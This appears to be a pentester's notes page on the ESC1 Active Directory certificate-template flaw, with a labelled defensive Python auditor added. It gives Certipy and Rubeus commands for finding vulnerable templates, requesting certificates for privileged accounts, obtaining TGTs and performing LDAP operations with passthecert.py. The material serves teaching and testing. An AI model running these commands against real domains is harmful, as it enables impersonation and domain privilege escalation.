Certificates in AD

Read the Certified Pre-Owned white-paper to understand certificates and their attack vectors

Certipy

Certipy is incompatible with Python 3.11 and greater at the moment. A quick workaround is found here

To enumerate AD for vulnerable certificate templates, we can use this command:

sudo certipy-ad find -u 'user@domain' -dc-ip <dc-ip> -vulnerable -enabled

Certipy writes the configuration details of interest to JSON and TXT files following the naming convention "<DATE-TIMESTAMP>_Certipy".

ESC1

A certificate template with the ESC1 vulnerability allows low-privileged users to enroll and request a certificate for any domain object specified by the user. This means that any user with enrollment rights can request a certificate for a privileged account, such as a domain administrator.

Vulnerable templates have the following configurations:

  • Client Authentication: True

  • Enabled: True

  • Enrollee Supplies Subject: True

  • Requires Management Approval: False

  • Authorized Signatures Required: 0
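As an added defender-side example (not code from this page or from Certipy), the following Python audits a report against the five settings just listed and also reports whether broad groups hold enrollment rights, since that is what makes such a template reachable by low-privileged users. The JSON layout (a "Certificate Templates" list with "Template Name" and "Enrollment Rights" fields, and keys spelled exactly as on this page) and the set of broad groups are assumptions; Certipy's real output may spell its keys differently, so map them before feeding a real file in.

```python
import json
from typing import Dict, List

# The five settings the page lists for an ESC1-prone template, with the
# value that makes the template dangerous. Key names are copied from the
# page; the JSON schema itself is an assumption, not Certipy's own, so
# map Certipy's real keys to these before calling find_esc1().
ESC1_CONDITIONS = {
    "Client Authentication": True,
    "Enabled": True,
    "Enrollee Supplies Subject": True,
    "Requires Management Approval": False,
    "Authorized Signatures Required": 0,
}

# Groups that effectively mean "any low-privileged user" (assumption;
# extend for your own environment).
BROAD_PRINCIPALS = {"Domain Users", "Authenticated Users", "Domain Computers"}


def matches_esc1(template: Dict) -> bool:
    """True only if every ESC1 setting is present with the dangerous value.
    A missing setting counts as not confirmed, so incomplete data is never
    flagged by accident."""
    return all(
        key in template and template[key] == bad_value
        for key, bad_value in ESC1_CONDITIONS.items()
    )


def broad_enrollment(template: Dict, broad=BROAD_PRINCIPALS) -> List[str]:
    """Which broad groups hold enrollment rights on the template.
    Empty if enrollment is limited to specific principals or the field is
    absent. A DOMAIN\\ prefix is stripped so "CORP\\Domain Users" matches."""
    names = {entry.split("\\")[-1] for entry in template.get("Enrollment Rights", [])}
    return sorted(names & broad)


def find_esc1(report_json: str) -> List[Dict]:
    """Parse a report and return one finding per ESC1-configured template."""
    data = json.loads(report_json)
    findings = []
    for template in data.get("Certificate Templates", []):
        if not matches_esc1(template):
            continue
        findings.append({
            "template": template.get("Template Name", "<unnamed>"),
            "broad_enrollment": broad_enrollment(template),
        })
    return findings


# Constructed sample in the assumed schema (not real Certipy output).
SAMPLE_REPORT = json.dumps({
    "Certificate Templates": [
        {   # all five ESC1 settings plus Domain Users enrollment: the real risk
            "Template Name": "FOO_Templ",
            "Client Authentication": True,
            "Enabled": True,
            "Enrollee Supplies Subject": True,
            "Requires Management Approval": False,
            "Authorized Signatures Required": 0,
            "Enrollment Rights": ["CORP\\Domain Users", "CORP\\PKI Admins"],
        },
        {   # same settings, but only admins may enroll: still worth fixing
            "Template Name": "LimitedTempl",
            "Client Authentication": True,
            "Enabled": True,
            "Enrollee Supplies Subject": True,
            "Requires Management Approval": False,
            "Authorized Signatures Required": 0,
            "Enrollment Rights": ["CORP\\PKI Admins"],
        },
        {   # subject is built from AD, so the enrollee cannot choose it
            "Template Name": "User",
            "Client Authentication": True,
            "Enabled": True,
            "Enrollee Supplies Subject": False,
            "Requires Management Approval": False,
            "Authorized Signatures Required": 0,
            "Enrollment Rights": ["CORP\\Domain Users"],
        },
        {   # enrollee supplies subject, but manager approval gates issuance
            "Template Name": "Gated",
            "Client Authentication": True,
            "Enabled": True,
            "Enrollee Supplies Subject": True,
            "Requires Management Approval": True,
            "Authorized Signatures Required": 0,
            "Enrollment Rights": ["CORP\\Domain Users"],
        },
    ]
})

if __name__ == "__main__":
    for finding in find_esc1(SAMPLE_REPORT):
        print(finding)
```

Run against the constructed report it flags FOO_Templ (with Domain Users able to enroll) and LimitedTempl (same settings, but no broad group holds enrollment rights), and skips the two templates where the enrollee cannot set the subject or where manager approval gates issuance. Missing keys deliberately fail the check rather than pass it, so a partial export produces fewer findings rather than false ones.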

The Certipy command required to request a certificate includes the following arguments:

-u : username
-p : compromised user password
-dc-ip : domain controller IP address
-target : target CA (Certificate Authority) DNS (Domain Name System) name
-ca : short CA name
-template : vulnerable template name
-upn : target user/object name

The full Certipy command is shown below:

sudo certipy-ad req -u 'user@domain' \
-dc-ip '<dc-ip>' \
-target 'foobar-CA.foobar.com' \
-ca 'foobar-CA' \
-template 'FOO_Templ' \
-upn 'target_user@domain'

If everything goes well, you'll get a certificate file <target_user>.pfx, which can then be used to request a TGT.

With Rubeus:

Rubeus.exe asktgt /user:<target_user> /certificate:<path_to_cert>.pfx /domain:<domain> /dc:<domain-controller>

With Certipy:

sudo certipy-ad auth -pfx '<path_to_cert>.pfx' -username '<target_user>' -domain '<domain>' -dc-ip '<dc-ip>'

Note that if you get the error "KDC_ERR_PADATA_TYPE_NOSUPP", PKINIT is not available on the domain controller. You can then instead authenticate to LDAP directly with the certificate.

If you use Certipy to retrieve certificates, you can extract the key and the certificate from the pfx by using:

certipy-ad cert -pfx user.pfx -nokey -out user.crt
certipy-ad cert -pfx user.pfx -nocert -out user.key

Then we can use passthecert.py to perform different LDAP operations with the extracted certificate and key:

sudo python3 passthecert.py -action whoami -crt user.crt -key user.key -domain <domain> -dc-ip <dc-ip>
